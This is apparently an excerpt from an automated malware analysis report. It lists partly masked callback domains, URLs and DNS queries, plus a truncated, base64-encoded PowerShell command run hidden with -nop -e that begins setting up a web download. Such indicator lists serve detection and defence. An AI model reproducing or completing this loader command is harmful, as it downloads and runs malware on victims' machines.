Technical Information
- 'fo###vina.com':80
- 'ge###hones.com':80
- http://fo###vina.com/7Ng1PJ6c_06A6o9Gf0
- http://ge###hones.com/7tiulfTLFpBx3Py_1
- DNS ASK ha###opa.com
- DNS ASK fo###vina.com
- DNS ASK fl#.eng.br
- DNS ASK ga######qhotpotbuffet.com
- DNS ASK ge###hones.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JAB3ADAAXwBfADIANgBfADMAPQAoACcAaAAnACsAJwA0ADkAXwBfADUAJwArACcAMQA4ACcAKQA7ACQATAA3AF8AMwBfAF8AMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABTADMAXwAxADAAM...' (with hidden window)